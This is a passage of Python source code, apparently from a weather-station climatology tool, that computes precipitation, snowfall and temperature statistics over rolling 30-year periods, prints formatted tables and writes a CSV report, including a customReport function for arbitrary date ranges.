len(alltime["prcpPROP"]["year_max_days"][1]), alltime["prcpPROP"]["year_min_days"][0], alltime["prcpPROP"]["year_min_days"][1][0] if len(alltime["prcpPROP"]["year_min_days"][1]) == 1 else len(alltime["prcpPROP"]["year_min_days"][1]), round(mean(alltime["prcp"]),2) if len(alltime["prcp"]) > 0 else "--", round(alltime["prcpPROP"]["year_max"][0],2), alltime["prcpPROP"]["year_max"][1][0] if len(alltime["prcpPROP"]["year_max"][1]) == 1 else len(alltime["prcpPROP"]["year_max"][1]), round(alltime["prcpPROP"]["year_min"][0],2), alltime["prcpPROP"]["year_min"][1][0] if len(alltime["prcpPROP"]["year_min"][1]) == 1 else len(alltime["prcpPROP"]["year_min"][1]), alltime["snowPROP"]["days"] if alltime["snowPROP"]["days"] > 0 else "--", round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1) if alltime["snowPROP"]["days"] > 0 else "--", alltime["snowPROP"]["year_max_days"][0], alltime["snowPROP"]["year_max_days"][1][0] if len(alltime["snowPROP"]["year_max_days"][1]) == 1 else len(alltime["snowPROP"]["year_max_days"][1]), round(mean(alltime["snow"]),1) if len(alltime["snow"]) > 0 else "--", round(alltime["snowPROP"]["year_max"][0],2), alltime["snowPROP"]["year_max"][1][0] if len(alltime["snowPROP"]["year_max"][1]) == 1 else len(alltime["snowPROP"]["year_max"][1]))) for c in climo30yrs: #print(climo30yrs[c]["prcpPROP"]["days"],climo30yrs[c]["total_days"]) #print(climo30yrs[c]["snowPROP"]["days"],climo30yrs[c]["total_days"]) try: print("{:^9} {:5}:{:>5}% {:>3}, {:^4} {:>3}, {:^4} {:^6.2f} {:>6.2f}, {:^4} {:>6.2f}, {:^4} | {:4}:{:>5}% {:>3}, {:^4} {:^6.1f} {:>5.1f}, {:^4} |".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), climo30yrs[c]["prcpPROP"]["days"], round(100 * climo30yrs[c]["prcpPROP"]["days"] / climo30yrs[c]["total_days"],1), climo30yrs[c]["prcpPROP"]["year_max_days"][0], climo30yrs[c]["prcpPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max_days"][1]), climo30yrs[c]["prcpPROP"]["year_min_days"][0], climo30yrs[c]["prcpPROP"]["year_min_days"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min_days"][1]), round(mean(climo30yrs[c]["prcp"]),2), round(climo30yrs[c]["prcpPROP"]["year_max"][0],2), climo30yrs[c]["prcpPROP"]["year_max"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_max"][1]), round(climo30yrs[c]["prcpPROP"]["year_min"][0],2), climo30yrs[c]["prcpPROP"]["year_min"][1][0] if len(climo30yrs[c]["prcpPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["prcpPROP"]["year_min"][1]), climo30yrs[c]["snowPROP"]["days"] if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", round(100 * climo30yrs[c]["snowPROP"]["days"] / climo30yrs[c]["total_days"],1) if climo30yrs[c]["snowPROP"]["days"] > 0 else "--", climo30yrs[c]["snowPROP"]["year_max_days"][0], climo30yrs[c]["snowPROP"]["year_max_days"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max_days"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max_days"][1]), round(mean(climo30yrs[c]["snow"]),1) if len(climo30yrs[c]["snow"]) > 0 else "--", round(climo30yrs[c]["snowPROP"]["year_max"][0],2), climo30yrs[c]["snowPROP"]["year_max"][1][0] if len(climo30yrs[c]["snowPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["snowPROP"]["year_max"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("\nPart 2: Temperature Stats") print("{:▒^9} {:▒^37} | {:▒^37} | {:▒^37}".format("Years","AVG TEMP","TMAX","TMIN")) print("{:▒^9} {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12} | {:▒<5} {:▒^5} {:▒^12} {:▒^12}".format("","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN","STDEV","AVG","MAX","MIN")) # Y TSTDV TMA TMX TMn TSTDV TMA TMX TMn TSTDV TMA TMX TMn # "tempAVGlist": [],"tavgPROP":{"year_max":[-999,[]],"year_min":[999,[]]}, print("{:-^9} {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12} | {:-^5} {:-^5} {:-^12} {:-^12}".format("","","","","","","","","","","","","")) print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format("All Time", round(pstdev(alltime["tempAVGlist"]),1), round(mean(alltime["tempAVGlist_ind"]),1), round(alltime["tavgPROP"]["year_max"][0],1), alltime["tavgPROP"]["year_max"][1][0] if len(alltime["tavgPROP"]["year_max"][1]) == 1 else len(alltime["tavgPROP"]["year_max"][1]), round(alltime["tavgPROP"]["year_min"][0],1), alltime["tavgPROP"]["year_min"][1][0] if len(alltime["tavgPROP"]["year_min"][1]) == 1 else len(alltime["tavgPROP"]["year_min"][1]), round(pstdev(alltime["tmax"]),1), round(mean(alltime["tmax"]),1), round(alltime["tmaxPROP"]["year_max"][0],1), alltime["tmaxPROP"]["year_max"][1][0] if len(alltime["tmaxPROP"]["year_max"][1]) == 1 else len(alltime["tmaxPROP"]["year_max"][1]), round(alltime["tmaxPROP"]["year_min"][0],1), alltime["tmaxPROP"]["year_min"][1][0] if len(alltime["tmaxPROP"]["year_min"][1]) == 1 else len(alltime["tmaxPROP"]["year_min"][1]), round(pstdev(alltime["tmin"]),1), round(mean(alltime["tmin"]),1), round(alltime["tminPROP"]["year_max"][0],1), alltime["tminPROP"]["year_max"][1][0] if len(alltime["tminPROP"]["year_max"][1]) == 1 else len(alltime["tminPROP"]["year_max"][1]), round(alltime["tminPROP"]["year_min"][0],1), alltime["tminPROP"]["year_min"][1][0] if len(alltime["tminPROP"]["year_min"][1]) == 1 else len(alltime["tminPROP"]["year_min"][1]))) for c in climo30yrs: try: print("{:^9} {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5} | {:^5.1f} {:^5.1f} {:>5.1f}, {:^5} {:>5.1f}, {:^5}".format(str(climo30yrs[c]["years"][0])+"-"+str(climo30yrs[c]["years"][1]), round(pstdev(climo30yrs[c]["tempAVGlist"]),1), round(mean(climo30yrs[c]["tempAVGlist_ind"]),1), round(climo30yrs[c]["tavgPROP"]["year_max"][0],1), climo30yrs[c]["tavgPROP"]["year_max"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_max"][1]), round(climo30yrs[c]["tavgPROP"]["year_min"][0],1), climo30yrs[c]["tavgPROP"]["year_min"][1][0] if len(climo30yrs[c]["tavgPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tavgPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmax"]),1), round(mean(climo30yrs[c]["tmax"]),1), round(climo30yrs[c]["tmaxPROP"]["year_max"][0],1), climo30yrs[c]["tmaxPROP"]["year_max"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_max"][1]), round(climo30yrs[c]["tmaxPROP"]["year_min"][0],1), climo30yrs[c]["tmaxPROP"]["year_min"][1][0] if len(climo30yrs[c]["tmaxPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tmaxPROP"]["year_min"][1]), round(pstdev(climo30yrs[c]["tmin"]),1), round(mean(climo30yrs[c]["tmin"]),1), round(climo30yrs[c]["tminPROP"]["year_max"][0],1), climo30yrs[c]["tminPROP"]["year_max"][1][0] if len(climo30yrs[c]["tminPROP"]["year_max"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_max"][1]), round(climo30yrs[c]["tminPROP"]["year_min"][0],1), climo30yrs[c]["tminPROP"]["year_min"][1][0] if len(climo30yrs[c]["tminPROP"]["year_min"][1]) == 1 else len(climo30yrs[c]["tminPROP"]["year_min"][1]))) except Exception as e: print("ERROR: Era = {}; Exception = {}".format(c,e)) print("") if output == True: newfn = "metYearReport_Mar-Feb_" + str(climatology) + "YRclimo_" + str(increment) + "YRincr_" + clmt["station_name"] + ".csv" with open(newfn,"w") as w: headers = ["Assessed Period (March to February)","PRCP Days","PRCP % of days","PRCP stdev","PRCP AVG","SNOW Days","SNOW % of days","SNOW stdev","SNOW AVG","TAVG stdev","TAVG","TMAX stdev","TMAX","TMIN stdev","TMIN"] # HEADER for x in range(len(headers)): if x != len(headers) - 1: w.write(headers[x]); w.write(",") else: w.write(headers[x]); w.write("\n") w.write("{}-{}".format(alltime["years"][0],alltime["years"][1])); w.write(",") w.write("{}".format(alltime["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["prcpPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["prcp"]),1))); w.write(",") w.write("{}".format(alltime["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * alltime["snowPROP"]["days"] / alltime["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(alltime["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(alltime["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(alltime["tmin"]))); w.write("\n") for x in climo30yrs: w.write("{}-{}".format(climo30yrs[x]["years"][0],climo30yrs[x]["years"][1])); w.write(",") w.write("{}".format(climo30yrs[x]["prcpPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["prcpPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["prcp"]),1))); w.write(",") w.write("{}".format(climo30yrs[x]["snowPROP"]["days"])); w.write(",") w.write("{:.1f}".format(round(100 * climo30yrs[x]["snowPROP"]["days"] / climo30yrs[x]["total_days"],1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(mean(climo30yrs[x]["snow"]),1))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tempAVGlist"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tempAVGlist_ind"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmax"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmax"]))); w.write(",") w.write("{:.1f}".format(round(pstdev(climo30yrs[x]["tmin"]),1))); w.write(",") w.write("{:.2f}".format(mean(climo30yrs[x]["tmin"]))); w.write("\n") print("*** csv output successful ***") def customReport(m1,d1,*date2,climatology=30,increment=5,output=False): """Detailed Climatological Report a defined custom period of time and can be of variable length. Args: m1: The start month of the custom period. d1: The start day of the custom period. Args (optional; represented by *date2) m2: The end month of the custom period d2: The end day of the custom period * If these variables are not given, the end date defaults to Dec. 31. Keyword Args (optional): climatology = 30: The span of years that averages are calculated for (ie. '30 year climatology' or '30 year average'). This can be modified but should always be > the increment. increment = 5: Tells the script how often to assess/record successive climatologies. The smaller this is, the longer the report takes to generate. If kept at the default, for example, it would capture the 1976-2005, 1981-2010, and 1986-2015 climatologies and so forth. output = False: If set to True, the script will output a CSV file of its findings. This could be opened in a spreadsheet program for further analysis Examples: customReport(2,14,5,31) -> Returns a 30-yr, 5-yr incremented climatological report records between Feb 14 and May 31. customReport(7,1,climatology=10) -> Returns a 5-yr incremented, 10yr climatological report for records between July 1 and Dec 31 (the latter-half of the year, essentially). customReport(3,21,3,20,increment=1) -> Returns a 1-yr incremented, 30-yr climatology report for the period of Mar 21 thru Mar 20 of the following year. This would be a good substitute for assessing astronomical years on the basis of the Spring Equinox. customReport(1,1,6,31,output=True) -> Returns a 5-yr incremented, 30 yr climatology for dates between Jan 1 and Jun 30 (the first half of the calendar year). It also outputs a CSV report of the findings. """ if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.") valid_yrs = list(range(min([x for x in clmt.keys() if type(x) == int]),max([x for x in clmt.keys() if type(x) == int])+1)) #valid_yrs = [x for x in metclmt.keys() if type(x) == int] valid_yrs.sort() if any(type(x) != int for x in [m1,d1]): return print("*** OOPS! Ensure that only integers are entered ***") if len(date2) == 0: pass elif len(date2) != 2: return print("*** OOPS! For the 2nd (optional) date, ensure only a Month and Date are entered ***") elif any(type(x) != int for x in [date2[0],date2[1]]): return print("*** OOPS! Ensure that only integers are entered ***") if len(date2) == 2: m2 = date2[0] d2 = date2[1] else: m2 = 12 d2 = 31 if m2 == m1: if d2 == d1: return print("*** OOPS! Ensure different dates! ***") if m1 == 2 and d1 == 29: d1 = 28 if m2 == 2 and d2 == 29: d2 = 28 # Determine total length of period (used for exclusion calculation) s = datetime.date(1900,m1,d1) test = datetime.date(1900,m2,d2) if test > s: e = test else: e = datetime.date(1901,m2,d2) timelength = (e - s).days + 1 if timelength < 7: EXCLD = 1 elif timelength == 7: EXCLD = excludeweek elif timelength in [28,29,30,31]: EXCLD = excludemonth elif timelength >= 350: EXCLD = excludeyear else: EXCLD = round(excludecustom * timelength) print("EXCLUDING PERIODS OF <= {} DAYS".format(EXCLD)) climo30yrs = {} for x in range(1811,max(valid_yrs)+1,increment): if x in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]) and x+climatology-1 in range(valid_yrs[0],valid_yrs[len(valid_yrs)-1]+1): climo30yrs[(x,x+climatology-1)] = {"years":(x,x+climatology-1),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"e_max_days":[-1,[]],"e_min_days":[999,[]],"e_max":[-1,[]],"e_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"e_max_days":[-1,[]],"e_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmax": [],"tmaxPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmin": [],"tminPROP":{"e_max":[-999,[]],"e_min":[999,[]]}} alltime = {"years":(valid_yrs[0],valid_yrs[len(valid_yrs)-1]),"total_days":0, "prcp": [],"prcpPROP":{"days":0,"e_max_days":[-1,[]],"e_min_days":[999,[]],"e_max":[-1,[]],"e_min":[999,[]]}, "snow": [],"snowPROP":{"days":0,"e_max_days":[-1,[]],"e_max":[-1,[]]}, "tempAVGlist": [],"tempAVGlist_ind":[],"tavgPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmax": [],"tmaxPROP":{"e_max":[-999,[]],"e_min":[999,[]]}, "tmin": [],"tminPROP":{"e_max":[-999,[]],"e_min":[999,[]]}} e = {} # Will hold the date-to-date (represented by a parent year) stats print("*** Be Patient. This could take a few moments ***") for YYYY in valid_yrs: startday = datetime.date(YYYY,m1,d1) incr_day = startday if m2 < m1: endday = datetime.date(YYYY+1,m2,d2) # if end month is less, the results will bleed into the following year elif m2 == m1: # Deals with if the months of the dates are exactly the same if d2 < d1: endday = datetime.date(YYYY+1,m2,d2) # like above, if month is the same, but date is less, results will bleed into following year else: endday = datetime.date(YYYY,m2,d2) # OTHERWISE, it is assumed the same year else: endday = datetime.date(YYYY,m2,d2) # If month2 is > than month 1, the active year will be used if endday.year > max(valid_yrs): break #if YYYY not in e: e[YYYY] = {"recordqty":0, "prcp":[],"prcpDAYS":0,"snow":[],"snowDAYS":0, "tempAVGlist":[],"tmax":[],"tmin":[]} while incr_day <= endday: y = incr_day.year; m = incr_day.month; d = incr_day.day if y in clmt and m in clmt[y] and d in clmt[y][m]: e[YYYY]["recordqty"] += 1 # PRCP if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]: if float(clmt[y][m][d].prcp) > 0: e[YYYY]["prcp"].append(round(float(clmt[y][m][d].prcp),2)) if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1 if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp == "" and clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1 # SNOW if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]: if float(clmt[y][m][d].snow) > 0: e[YYYY]["snow"].append(round(float(clmt[y][m][d].snow),2)) if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1 if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow == "" and clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1 # TAVG if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmax)) e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmin)) # TMAX if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]: if clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): e[YYYY]["tmax"].append(int(clmt[y][m][d].tmax)) # TMIN if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]: if clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax): e[YYYY]["tmin"].append(int(clmt[y][m][d].tmin)) incr_day += datetime.timedelta(days=1) # GO ON TO TEST NEXT DAY for YYYY in e: #print('e[{}]["prcpDAYS"] = {}'.format(YYYY,e[YYYY]["prcpDAYS"])) #print('sum(e[{}]["prcp"] = {})'.format(YYYY,sum(e[YYYY]["prcp"]))) #print("----") #print('alltime["prcpPROP"]["e_max_days"][0] = {}'.format(alltime["prcpPROP"]["e_max_days"][0])) #print('alltime["prcpPROP"]["e_max_days"][1] = {}'.format(alltime["prcpPROP"]["e_max_days"][1])) #print('alltime["prcpPROP"]["e_max"][0] = {}'.format(alltime["prcpPROP"]["e_max"][0])) #print('alltime["prcpPROP"]["e_max"][1] = {}'.format(alltime["prcpPROP"]["e_max"][1])) #input("----") alltime["total_days"] += e[YYYY]["recordqty"] # PRCP alltime["prcp"].append(sum(e[YYYY]["prcp"])) alltime["prcpPROP"]["days"] += e[YYYY]["prcpDAYS"] if e[YYYY]["prcpDAYS"] == alltime["prcpPROP"]["e_max_days"][0]: alltime["prcpPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] > alltime["prcpPROP"]["e_max_days"][0]: alltime["prcpPROP"]["e_max_days"][0] = e[YYYY]["prcpDAYS"] alltime["prcpPROP"]["e_max_days"][1] = [] alltime["prcpPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == alltime["prcpPROP"]["e_max"][0]: alltime["prcpPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) > alltime["prcpPROP"]["e_max"][0]: alltime["prcpPROP"]["e_max"][0] = sum(e[YYYY]["prcp"]) alltime["prcpPROP"]["e_max"][1] = [] alltime["prcpPROP"]["e_max"][1].append(YYYY) if e[YYYY]["recordqty"] > EXCLD: if e[YYYY]["prcpDAYS"] == alltime["prcpPROP"]["e_min_days"][0]: alltime["prcpPROP"]["e_min_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] < alltime["prcpPROP"]["e_min_days"][0]: alltime["prcpPROP"]["e_min_days"][0] = e[YYYY]["prcpDAYS"] alltime["prcpPROP"]["e_min_days"][1] = [] alltime["prcpPROP"]["e_min_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == alltime["prcpPROP"]["e_min"][0]: alltime["prcpPROP"]["e_min"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) < alltime["prcpPROP"]["e_min"][0]: alltime["prcpPROP"]["e_min"][0] = sum(e[YYYY]["prcp"]) alltime["prcpPROP"]["e_min"][1] = [] alltime["prcpPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["prcp"].append(sum(e[YYYY]["prcp"])) climo30yrs[c]["prcpPROP"]["days"] += e[YYYY]["prcpDAYS"] climo30yrs[c]["total_days"] += e[YYYY]["recordqty"] if e[YYYY]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["e_max_days"][0]: climo30yrs[c]["prcpPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] > climo30yrs[c]["prcpPROP"]["e_max_days"][0]: climo30yrs[c]["prcpPROP"]["e_max_days"][0] = e[YYYY]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["e_max_days"][1] = [] climo30yrs[c]["prcpPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == climo30yrs[c]["prcpPROP"]["e_max"][0]: climo30yrs[c]["prcpPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) > climo30yrs[c]["prcpPROP"]["e_max"][0]: climo30yrs[c]["prcpPROP"]["e_max"][0] = sum(e[YYYY]["prcp"]) climo30yrs[c]["prcpPROP"]["e_max"][1] = [] climo30yrs[c]["prcpPROP"]["e_max"][1].append(YYYY) if e[YYYY]["recordqty"] > EXCLD: if e[YYYY]["prcpDAYS"] == climo30yrs[c]["prcpPROP"]["e_min_days"][0]: climo30yrs[c]["prcpPROP"]["e_min_days"][1].append(YYYY) elif e[YYYY]["prcpDAYS"] < climo30yrs[c]["prcpPROP"]["e_min_days"][0]: climo30yrs[c]["prcpPROP"]["e_min_days"][0] = e[YYYY]["prcpDAYS"] climo30yrs[c]["prcpPROP"]["e_min_days"][1] = [] climo30yrs[c]["prcpPROP"]["e_min_days"][1].append(YYYY) if sum(e[YYYY]["prcp"]) == climo30yrs[c]["prcpPROP"]["e_min"][0]: climo30yrs[c]["prcpPROP"]["e_min"][1].append(YYYY) elif sum(e[YYYY]["prcp"]) < climo30yrs[c]["prcpPROP"]["e_min"][0]: climo30yrs[c]["prcpPROP"]["e_min"][0] = sum(e[YYYY]["prcp"]) climo30yrs[c]["prcpPROP"]["e_min"][1] = [] climo30yrs[c]["prcpPROP"]["e_min"][1].append(YYYY) # SNOW alltime["snow"].append(sum(e[YYYY]["snow"])) alltime["snowPROP"]["days"] += e[YYYY]["snowDAYS"] if e[YYYY]["snowDAYS"] == alltime["snowPROP"]["e_max_days"][0]: alltime["snowPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["snowDAYS"] > alltime["snowPROP"]["e_max_days"][0]: alltime["snowPROP"]["e_max_days"][0] = e[YYYY]["snowDAYS"] alltime["snowPROP"]["e_max_days"][1] = [] alltime["snowPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["snow"]) == alltime["snowPROP"]["e_max"][0]: alltime["snowPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["snow"]) > alltime["snowPROP"]["e_max"][0]: alltime["snowPROP"]["e_max"][0] = sum(e[YYYY]["snow"]) alltime["snowPROP"]["e_max"][1] = [] alltime["snowPROP"]["e_max"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): climo30yrs[c]["snow"].append(sum(e[YYYY]["snow"])) climo30yrs[c]["snowPROP"]["days"] += e[YYYY]["snowDAYS"] if e[YYYY]["snowDAYS"] == climo30yrs[c]["snowPROP"]["e_max_days"][0]: climo30yrs[c]["snowPROP"]["e_max_days"][1].append(YYYY) elif e[YYYY]["snowDAYS"] > climo30yrs[c]["snowPROP"]["e_max_days"][0]: climo30yrs[c]["snowPROP"]["e_max_days"][0] = e[YYYY]["snowDAYS"] climo30yrs[c]["snowPROP"]["e_max_days"][1] = [] climo30yrs[c]["snowPROP"]["e_max_days"][1].append(YYYY) if sum(e[YYYY]["snow"]) == climo30yrs[c]["snowPROP"]["e_max"][0]: climo30yrs[c]["snowPROP"]["e_max"][1].append(YYYY) elif sum(e[YYYY]["snow"]) > climo30yrs[c]["snowPROP"]["e_max"][0]: climo30yrs[c]["snowPROP"]["e_max"][0] = sum(e[YYYY]["snow"]) climo30yrs[c]["snowPROP"]["e_max"][1] = [] climo30yrs[c]["snowPROP"]["e_max"][1].append(YYYY) # 'recordqty', 'prcp', 'prcpDAYS', 'prcpPROP', 'snow', 'snowDAYS', 'snowPROP', 'tempAVGlist', 'tmax', 'tmaxPROP', 'tmin', 'tminPROP' # TAVG for x in e[YYYY]["tempAVGlist"]: alltime["tempAVGlist_ind"].append(x) if len(e[YYYY]["tempAVGlist"]) > EXCLD * 2: alltime["tempAVGlist"].append(mean(e[YYYY]["tempAVGlist"])) if mean(e[YYYY]["tempAVGlist"]) == alltime["tavgPROP"]["e_max"][0]: alltime["tavgPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) > alltime["tavgPROP"]["e_max"][0]: alltime["tavgPROP"]["e_max"][0] = mean(e[YYYY]["tempAVGlist"]) alltime["tavgPROP"]["e_max"][1] = [] alltime["tavgPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tempAVGlist"]) == alltime["tavgPROP"]["e_min"][0]: alltime["tavgPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) < alltime["tavgPROP"]["e_min"][0]: alltime["tavgPROP"]["e_min"][0] = mean(e[YYYY]["tempAVGlist"]) alltime["tavgPROP"]["e_min"][1] = [] alltime["tavgPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in e[YYYY]["tempAVGlist"]:climo30yrs[c]["tempAVGlist_ind"].append(x) if len(e[YYYY]["tempAVGlist"]) > EXCLD * 2: climo30yrs[c]["tempAVGlist"].append(mean(e[YYYY]["tempAVGlist"])) if mean(e[YYYY]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["e_max"][0]: climo30yrs[c]["tavgPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) > climo30yrs[c]["tavgPROP"]["e_max"][0]: climo30yrs[c]["tavgPROP"]["e_max"][0] = mean(e[YYYY]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["e_max"][1] = [] climo30yrs[c]["tavgPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tempAVGlist"]) == climo30yrs[c]["tavgPROP"]["e_min"][0]: climo30yrs[c]["tavgPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tempAVGlist"]) < climo30yrs[c]["tavgPROP"]["e_min"][0]: climo30yrs[c]["tavgPROP"]["e_min"][0] = mean(e[YYYY]["tempAVGlist"]) climo30yrs[c]["tavgPROP"]["e_min"][1] = [] climo30yrs[c]["tavgPROP"]["e_min"][1].append(YYYY) # TMAX for x in e[YYYY]["tmax"]: alltime["tmax"].append(x) if len(e[YYYY]["tmax"]) > EXCLD: if mean(e[YYYY]["tmax"]) == alltime["tmaxPROP"]["e_max"][0]: alltime["tmaxPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) > alltime["tmaxPROP"]["e_max"][0]: alltime["tmaxPROP"]["e_max"][0] = mean(e[YYYY]["tmax"]) alltime["tmaxPROP"]["e_max"][1] = [] alltime["tmaxPROP"]["e_max"][1].append(YYYY) if mean(e[YYYY]["tmax"]) == alltime["tmaxPROP"]["e_min"][0]: alltime["tmaxPROP"]["e_min"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) < alltime["tmaxPROP"]["e_min"][0]: alltime["tmaxPROP"]["e_min"][0] = mean(e[YYYY]["tmax"]) alltime["tmaxPROP"]["e_min"][1] = [] alltime["tmaxPROP"]["e_min"][1].append(YYYY) for c in climo30yrs: if YYYY >= c[0] and YYYY <= c[1] and c[0] >= min(YR for YR in clmt if type(YR) == int) and c[1] <= max(YR for YR in clmt if type(YR) == int): for x in e[YYYY]["tmax"]: climo30yrs[c]["tmax"].append(x) if len(e[YYYY]["tmax"]) > EXCLD: if mean(e[YYYY]["tmax"]) == climo30yrs[c]["tmaxPROP"]["e_max"][0]: climo30yrs[c]["tmaxPROP"]["e_max"][1].append(YYYY) elif mean(e[YYYY]["tmax"]) > climo30yrs[c]["tmaxPROP"]["e_max"][0]: climo30yrs[c]["tmaxPROP"]["e_max"][0] = 